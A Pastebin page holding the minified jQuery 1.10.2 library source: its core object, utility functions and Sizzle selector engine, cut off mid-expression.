Kchewz

Untitled

Nov 16th, 2018
304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 340.58 KB | None | 0 0
  1. /*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license
  2. //@ sourceMappingURL=jquery-1.10.2.min.map
  3. */
  4. (function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=/\S+/g,C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn=x.prototype={jquery:f,constructor:x,init:function(e,n,r){var i,o;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof x?n[0]:n,x.merge(this,x.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:a,!0)),k.test(i[1])&&x.isPlainObject(n))for(i in n)x.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(o=a.getElementById(i[2]),o&&o.parentNode){if(o.id!==i[2])return r.find(e);this.length=1,this[0]=o}return this.context=a,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):x.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),x.makeArray(e,this))},selector:"",length:0,toArray:function(){return g.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=x.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return x.each(this,e,t)},ready:function(e){return x.ready.promise().done(e),this},slice:function(){return this.pushStack(g.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(x.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:h,sort:[].sort,splice:[].splice},x.fn.init.prototype=x.fn,x.extend=x.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},l=1,u=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},l=2),"object"==typeof s||x.isFunction(s)||(s={}),u===l&&(s=this,--l);u>l;l++)if(null!=(o=arguments[l]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(x.isPlainObject(r)||(n=x.isArray(r)))?(n?(n=!1,a=e&&x.isArray(e)?e:[]):a=e&&x.isPlainObject(e)?e:{},s[i]=x.extend(c,a,r)):r!==t&&(s[i]=r));return s},x.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),noConflict:function(t){return e.$===x&&(e.$=u),t&&e.jQuery===x&&(e.jQuery=l),x},isReady:!1,readyWait:1,holdReady:function(e){e?x.readyWait++:x.ready(!0)},ready:function(e){if(e===!0?!--x.readyWait:!x.isReady){if(!a.body)return setTimeout(x.ready);x.isReady=!0,e!==!0&&--x.readyWait>0||(n.resolveWith(a,[x]),x.fn.trigger&&x(a).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===x.type(e)},isArray:Array.isArray||function(e){return"array"===x.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?c[y.call(e)]||"object":typeof e},isPlainObject:function(e){var n;if(!e||"object"!==x.type(e)||e.nodeType||x.isWindow(e))return!1;try{if(e.constructor&&!v.call(e,"constructor")&&!v.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}if(x.support.ownLast)for(n in e)return v.call(e,n);for(n in e);return n===t||v.call(e,n)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||a;var r=k.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=x.buildFragment([e],t,i),i&&x(i).remove(),x.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=x.trim(n),n&&E.test(n.replace(A,"@").replace(j,"]").replace(S,"")))?Function("return "+n)():(x.error("Invalid JSON: "+n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||x.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&x.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(D,"ms-").replace(L,H)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,o=e.length,a=M(e);if(n){if(a){for(;o>i;i++)if(r=t.apply(e[i],n),r===!1)break}else for(i in e)if(r=t.apply(e[i],n),r===!1)break}else if(a){for(;o>i;i++)if(r=t.call(e[i],i,e[i]),r===!1)break}else for(i in e)if(r=t.call(e[i],i,e[i]),r===!1)break;return e},trim:b&&!b.call("\ufeff\u00a0")?function(e){return null==e?"":b.call(e)}:function(e){return null==e?"":(e+"").replace(C,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(M(Object(e))?x.merge(n,"string"==typeof e?[e]:e):h.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(m)return m.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r+n):n:0;r>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o++)e[i++]=n[o];else while(n[o]!==t)e[i++]=n[o++];return e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o++)r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,n){var r,i=0,o=e.length,a=M(e),s=[];if(a)for(;o>i;i++)r=t(e[i],i,n),null!=r&&(s[s.length]=r);else for(i in e)r=t(e[i],i,n),null!=r&&(s[s.length]=r);return d.apply([],s)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(o=e[n],n=e,e=o),x.isFunction(e)?(r=g.call(arguments,2),i=function(){return e.apply(n||this,r.concat(g.call(arguments)))},i.guid=e.guid=e.guid||x.guid++,i):t},access:function(e,n,r,i,o,a,s){var l=0,u=e.length,c=null==r;if("object"===x.type(r)){o=!0;for(l in r)x.access(e,n,l,r[l],!0,a,s)}else if(i!==t&&(o=!0,x.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(x(e),n)})),n))for(;u>l;l++)n(e[l],r,s?i:i.call(e[l],l,n(e[l],r)));return o?e:c?n.call(e):u?n(e[0],r):a},now:function(){return(new Date).getTime()},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),x.ready.promise=function(t){if(!n)if(n=x.Deferred(),"complete"===a.readyState)setTimeout(x.ready);else if(a.addEventListener)a.addEventListener("DOMContentLoaded",q,!1),e.addEventListener("load",q,!1);else{a.attachEvent("onreadystatechange",q),e.attachEvent("onload",q);var r=!1;try{r=null==e.frameElement&&a.documentElement}catch(i){}r&&r.doScroll&&function o(){if(!x.isReady){try{r.doScroll("left")}catch(e){return setTimeout(o,50)}_(),x.ready()}}()}return n.promise(t)},x.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){c["[object "+t+"]"]=t.toLowerCase()});function M(e){var t=e.length,n=x.type(e);return x.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}r=x(a),function(e,t){var n,r,i,o,a,s,l,u,c,p,f,d,h,g,m,y,v,b="sizzle"+-new Date,w=e.document,T=0,C=0,N=st(),k=st(),E=st(),S=!1,A=function(e,t){return e===t?(S=!0,0):0},j=typeof t,D=1<<31,L={}.hasOwnProperty,H=[],q=H.pop,_=H.push,M=H.push,O=H.slice,F=H.indexOf||function(e){var t=0,n=this.length;for(;n>t;t++)if(this[t]===e)return t;return-1},B="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",W=R.replace("w","w#"),$="\\["+P+"*("+R+")"+P+"*(?:([*^$|!~]?=)"+P+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+W+")|)|)"+P+"*\\]",I=":("+R+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+$.replace(3,8)+")*)|.*)\\)|)",z=RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),X=RegExp("^"+P+"*,"+P+"*"),U=RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),V=RegExp(P+"*[+~]"),Y=RegExp("="+P+"*([^\\]'\"]*)"+P+"*\\]","g"),J=RegExp(I),G=RegExp("^"+W+"$"),Q={ID:RegExp("^#("+R+")"),CLASS:RegExp("^\\.("+R+")"),TAG:RegExp("^("+R.replace("w","w*")+")"),ATTR:RegExp("^"+$),PSEUDO:RegExp("^"+I),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+P+"*(even|odd|(([+-]|)(\\d*)n|)"+P+"*(?:([+-]|)"+P+"*(\\d+)|))"+P+"*\\)|)","i"),bool:RegExp("^(?:"+B+")$","i"),needsContext:RegExp("^"+P+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+P+"*((?:-\\d)?\\d*)"+P+"*\\)|)(?=[^-]|$)","i")},K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,et=/^(?:input|select|textarea|button)$/i,tt=/^h\d$/i,nt=/'|\\/g,rt=RegExp("\\\\([\\da-f]{1,6}"+P+"?|("+P+")|.)","ig"),it=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:0>r?String.fromCharCode(r+65536):String.fromCharCode(55296|r>>10,56320|1023&r)};try{M.apply(H=O.call(w.childNodes),w.childNodes),H[w.childNodes.length].nodeType}catch(ot){M={apply:H.length?function(e,t){_.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function at(e,t,n,i){var o,a,s,l,u,c,d,m,y,x;if((t?t.ownerDocument||t:w)!==f&&p(t),t=t||f,n=n||[],!e||"string"!=typeof e)return n;if(1!==(l=t.nodeType)&&9!==l)return[];if(h&&!i){if(o=Z.exec(e))if(s=o[1]){if(9===l){if(a=t.getElementById(s),!a||!a.parentNode)return n;if(a.id===s)return n.push(a),n}else if(t.ownerDocument&&(a=t.ownerDocument.getElementById(s))&&v(t,a)&&a.id===s)return n.push(a),n}else{if(o[2])return M.apply(n,t.getElementsByTagName(e)),n;if((s=o[3])&&r.getElementsByClassName&&t.getElementsByClassName)return M.apply(n,t.getElementsByClassName(s)),n}if(r.qsa&&(!g||!g.test(e))){if(m=d=b,y=t,x=9===l&&e,1===l&&"object"!==t.nodeName.toLowerCase()){c=mt(e),(d=t.getAttribute("id"))?m=d.replace(nt,"\\$&"):t.setAttribute("id",m),m="[id='"+m+"'] ",u=c.length;while(u--)c[u]=m+yt(c[u]);y=V.test(e)&&t.parentNode||t,x=c.join(",")}if(x)try{return M.apply(n,y.querySelectorAll(x)),n}catch(T){}finally{d||t.removeAttribute("id")}}}return kt(e.replace(z,"$1"),t,n,i)}function st(){var e=[];function t(n,r){return e.push(n+=" ")>o.cacheLength&&delete t[e.shift()],t[n]=r}return t}function lt(e){return e[b]=!0,e}function ut(e){var t=f.createElement("div");try{return!!e(t)}catch(n){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function ct(e,t){var n=e.split("|"),r=e.length;while(r--)o.attrHandle[n[r]]=t}function pt(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&(~t.sourceIndex||D)-(~e.sourceIndex||D);if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function ft(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function dt(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function ht(e){return lt(function(t){return t=+t,lt(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}s=at.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},r=at.support={},p=at.setDocument=function(e){var n=e?e.ownerDocument||e:w,i=n.defaultView;return n!==f&&9===n.nodeType&&n.documentElement?(f=n,d=n.documentElement,h=!s(n),i&&i.attachEvent&&i!==i.top&&i.attachEvent("onbeforeunload",function(){p()}),r.attributes=ut(function(e){return e.className="i",!e.getAttribute("className")}),r.getElementsByTagName=ut(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),r.getElementsByClassName=ut(function(e){return e.innerHTML="<div class='a'></div><div class='a i'></div>",e.firstChild.className="i",2===e.getElementsByClassName("i").length}),r.getById=ut(function(e){return d.appendChild(e).id=b,!n.getElementsByName||!n.getElementsByName(b).length}),r.getById?(o.find.ID=function(e,t){if(typeof t.getElementById!==j&&h){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){return e.getAttribute("id")===t}}):(delete o.find.ID,o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){var n=typeof e.getAttributeNode!==j&&e.getAttributeNode("id");return n&&n.value===t}}),o.find.TAG=r.getElementsByTagName?function(e,n){return typeof n.getElementsByTagName!==j?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},o.find.CLASS=r.getElementsByClassName&&function(e,n){return typeof n.getElementsByClassName!==j&&h?n.getElementsByClassName(e):t},m=[],g=[],(r.qsa=K.test(n.querySelectorAll))&&(ut(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||g.push("\\["+P+"*(?:value|"+B+")"),e.querySelectorAll(":checked").length||g.push(":checked")}),ut(function(e){var t=n.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("t",""),e.querySelectorAll("[t^='']").length&&g.push("[*^$]="+P+"*(?:''|\"\")"),e.querySelectorAll(":enabled").length||g.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),g.push(",.*:")})),(r.matchesSelector=K.test(y=d.webkitMatchesSelector||d.mozMatchesSelector||d.oMatchesSelector||d.msMatchesSelector))&&ut(function(e){r.disconnectedMatch=y.call(e,"div"),y.call(e,"[s!='']:x"),m.push("!=",I)}),g=g.length&&RegExp(g.join("|")),m=m.length&&RegExp(m.join("|")),v=K.test(d.contains)||d.compareDocumentPosition?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},A=d.compareDocumentPosition?function(e,t){if(e===t)return S=!0,0;var i=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t);return i?1&i||!r.sortDetached&&t.compareDocumentPosition(e)===i?e===n||v(w,e)?-1:t===n||v(w,t)?1:c?F.call(c,e)-F.call(c,t):0:4&i?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,o=e.parentNode,a=t.parentNode,s=[e],l=[t];if(e===t)return S=!0,0;if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:c?F.call(c,e)-F.call(c,t):0;if(o===a)return pt(e,t);r=e;while(r=r.parentNode)s.unshift(r);r=t;while(r=r.parentNode)l.unshift(r);while(s[i]===l[i])i++;return i?pt(s[i],l[i]):s[i]===w?-1:l[i]===w?1:0},n):f},at.matches=function(e,t){return at(e,null,null,t)},at.matchesSelector=function(e,t){if((e.ownerDocument||e)!==f&&p(e),t=t.replace(Y,"='$1']"),!(!r.matchesSelector||!h||m&&m.test(t)||g&&g.test(t)))try{var n=y.call(e,t);if(n||r.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(i){}return at(t,f,null,[e]).length>0},at.contains=function(e,t){return(e.ownerDocument||e)!==f&&p(e),v(e,t)},at.attr=function(e,n){(e.ownerDocument||e)!==f&&p(e);var i=o.attrHandle[n.toLowerCase()],a=i&&L.call(o.attrHandle,n.toLowerCase())?i(e,n,!h):t;return a===t?r.attributes||!h?e.getAttribute(n):(a=e.getAttributeNode(n))&&a.specified?a.value:null:a},at.error=function(e){throw Error("Syntax error, unrecognized expression: "+e)},at.uniqueSort=function(e){var t,n=[],i=0,o=0;if(S=!r.detectDuplicates,c=!r.sortStable&&e.slice(0),e.sort(A),S){while(t=e[o++])t===e[o]&&(i=n.push(o));while(i--)e.splice(n[i],1)}return e},a=at.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=a(e)}else if(3===i||4===i)return e.nodeValue}else for(;t=e[r];r++)n+=a(t);return n},o=at.selectors={cacheLength:50,createPseudo:lt,match:Q,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(rt,it),e[3]=(e[4]||e[5]||"").replace(rt,it),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||at.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&at.error(e[0]),e},PSEUDO:function(e){var n,r=!e[5]&&e[2];return Q.CHILD.test(e[0])?null:(e[3]&&e[4]!==t?e[2]=e[4]:r&&J.test(r)&&(n=mt(r,!0))&&(n=r.indexOf(")",r.length-n)-r.length)&&(e[0]=e[0].slice(0,n),e[2]=r.slice(0,n)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(rt,it).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=N[e+" "];return t||(t=RegExp("(^|"+P+")"+e+"("+P+"|$)"))&&N(e,function(e){return t.test("string"==typeof e.className&&e.className||typeof e.getAttribute!==j&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=at.attr(r,e);return null==i?"!="===t:t?(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i+" ").indexOf(n)>-1:"|="===t?i===n||i.slice(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,l){var u,c,p,f,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!l&&!s;if(m){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){c=m[b]||(m[b]={}),u=c[e]||[],d=u[0]===T&&u[1],f=u[0]===T&&u[2],p=d&&m.childNodes[d];while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if(1===p.nodeType&&++f&&p===t){c[e]=[T,d,f];break}}else if(v&&(u=(t[b]||(t[b]={}))[e])&&u[0]===T)f=u[1];else while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===y:1===p.nodeType)&&++f&&(v&&((p[b]||(p[b]={}))[e]=[T,f]),p===t))break;return f-=i,f===r||0===f%r&&f/r>=0}}},PSEUDO:function(e,t){var n,r=o.pseudos[e]||o.setFilters[e.toLowerCase()]||at.error("unsupported pseudo: "+e);return r[b]?r(t):r.length>1?(n=[e,e,"",t],o.setFilters.hasOwnProperty(e.toLowerCase())?lt(function(e,n){var i,o=r(e,t),a=o.length;while(a--)i=F.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:lt(function(e){var t=[],n=[],r=l(e.replace(z,"$1"));return r[b]?lt(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:lt(function(e){return function(t){return at(e,t).length>0}}),contains:lt(function(e){return function(t){return(t.textContent||t.innerText||a(t)).indexOf(e)>-1}}),lang:lt(function(e){return G.test(e||"")||at.error("unsupported lang: "+e),e=e.replace(rt,it).toLowerCase(),function(t){var n;do if(n=h?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===d},focus:function(e){return e===f.activeElement&&(!f.hasFocus||f.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!o.pseudos.empty(e)},header:function(e){return tt.test(e.nodeName)},input:function(e){return et.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:ht(function(){return[0]}),last:ht(function(e,t){return[t-1]}),eq:ht(function(e,t,n){return[0>n?n+t:n]}),even:ht(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:ht(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:ht(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:ht(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);return e})}},o.pseudos.nth=o.pseudos.eq;for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})o.pseudos[n]=ft(n);for(n in{submit:!0,reset:!0})o.pseudos[n]=dt(n);function gt(){}gt.prototype=o.filters=o.pseudos,o.setFilters=new gt;function mt(e,t){var n,r,i,a,s,l,u,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,l=[],u=o.preFilter;while(s){(!n||(r=X.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),l.push(i=[])),n=!1,(r=U.exec(s))&&(n=r.shift(),i.push({value:n,type:r[0].replace(z," ")}),s=s.slice(n.length));for(a in o.filter)!(r=Q[a].exec(s))||u[a]&&!(r=u[a](r))||(n=r.shift(),i.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?at.error(e):k(e,l).slice(0)}function yt(e){var t=0,n=e.length,r="";for(;n>t;t++)r+=e[t].value;return r}function vt(e,t,n){var r=t.dir,o=n&&"parentNode"===r,a=C++;return t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||o)return e(t,n,i)}:function(t,n,s){var l,u,c,p=T+" "+a;if(s){while(t=t[r])if((1===t.nodeType||o)&&e(t,n,s))return!0}else while(t=t[r])if(1===t.nodeType||o)if(c=t[b]||(t[b]={}),(u=c[r])&&u[0]===p){if((l=u[1])===!0||l===i)return l===!0}else if(u=c[r]=[p],u[1]=e(t,n,s)||i,u[1]===!0)return!0}}function bt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function xt(e,t,n,r,i){var o,a=[],s=0,l=e.length,u=null!=t;for(;l>s;s++)(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),u&&t.push(s));return a}function wt(e,t,n,r,i,o){return r&&!r[b]&&(r=wt(r)),i&&!i[b]&&(i=wt(i,o)),lt(function(o,a,s,l){var u,c,p,f=[],d=[],h=a.length,g=o||Nt(t||"*",s.nodeType?[s]:s,[]),m=!e||!o&&t?g:xt(g,f,e,s,l),y=n?i||(o?e:h||r)?[]:a:m;if(n&&n(m,y,s,l),r){u=xt(y,d),r(u,[],s,l),c=u.length;while(c--)(p=u[c])&&(y[d[c]]=!(m[d[c]]=p))}if(o){if(i||e){if(i){u=[],c=y.length;while(c--)(p=y[c])&&u.push(m[c]=p);i(null,y=[],u,l)}c=y.length;while(c--)(p=y[c])&&(u=i?F.call(o,p):f[c])>-1&&(o[u]=!(a[u]=p))}}else y=xt(y===a?y.splice(h,y.length):y),i?i(null,a,y,l):M.apply(a,y)})}function Tt(e){var t,n,r,i=e.length,a=o.relative[e[0].type],s=a||o.relative[" "],l=a?1:0,c=vt(function(e){return e===t},s,!0),p=vt(function(e){return F.call(t,e)>-1},s,!0),f=[function(e,n,r){return!a&&(r||n!==u)||((t=n).nodeType?c(e,n,r):p(e,n,r))}];for(;i>l;l++)if(n=o.relative[e[l].type])f=[vt(bt(f),n)];else{if(n=o.filter[e[l].type].apply(null,e[l].matches),n[b]){for(r=++l;i>r;r++)if(o.relative[e[r].type])break;return wt(l>1&&bt(f),l>1&&yt(e.slice(0,l-1).concat({value:" "===e[l-2].type?"*":""})).replace(z,"$1"),n,r>l&&Tt(e.slice(l,r)),i>r&&Tt(e=e.slice(r)),i>r&&yt(e))}f.push(n)}return bt(f)}function Ct(e,t){var n=0,r=t.length>0,a=e.length>0,s=function(s,l,c,p,d){var h,g,m,y=[],v=0,b="0",x=s&&[],w=null!=d,C=u,N=s||a&&o.find.TAG("*",d&&l.parentNode||l),k=T+=null==C?1:Math.random()||.1;for(w&&(u=l!==f&&l,i=n);null!=(h=N[b]);b++){if(a&&h){g=0;while(m=e[g++])if(m(h,l,c)){p.push(h);break}w&&(T=k,i=++n)}r&&((h=!m&&h)&&v--,s&&x.push(h))}if(v+=b,r&&b!==v){g=0;while(m=t[g++])m(x,y,l,c);if(s){if(v>0)while(b--)x[b]||y[b]||(y[b]=q.call(p));y=xt(y)}M.apply(p,y),w&&!s&&y.length>0&&v+t.length>1&&at.uniqueSort(p)}return w&&(T=k,u=C),x};return r?lt(s):s}l=at.compile=function(e,t){var n,r=[],i=[],o=E[e+" "];if(!o){t||(t=mt(e)),n=t.length;while(n--)o=Tt(t[n]),o[b]?r.push(o):i.push(o);o=E(e,Ct(i,r))}return o};function Nt(e,t,n){var r=0,i=t.length;for(;i>r;r++)at(e,t[r],n);return n}function kt(e,t,n,i){var a,s,u,c,p,f=mt(e);if(!i&&1===f.length){if(s=f[0]=f[0].slice(0),s.length>2&&"ID"===(u=s[0]).type&&r.getById&&9===t.nodeType&&h&&o.relative[s[1].type]){if(t=(o.find.ID(u.matches[0].replace(rt,it),t)||[])[0],!t)return n;e=e.slice(s.shift().value.length)}a=Q.needsContext.test(e)?0:s.length;while(a--){if(u=s[a],o.relative[c=u.type])break;if((p=o.find[c])&&(i=p(u.matches[0].replace(rt,it),V.test(s[0].type)&&t.parentNode||t))){if(s.splice(a,1),e=i.length&&yt(s),!e)return M.apply(n,i),n;break}}}return l(e,f)(i,t,!h,n,V.test(e)),n}r.sortStable=b.split("").sort(A).join("")===b,r.detectDuplicates=S,p(),r.sortDetached=ut(function(e){return 1&e.compareDocumentPosition(f.createElement("div"))}),ut(function(e){return e.innerHTML="<a href='#'></a>","#"===e.firstChild.getAttribute("href")})||ct("type|href|height|width",function(e,n,r){return 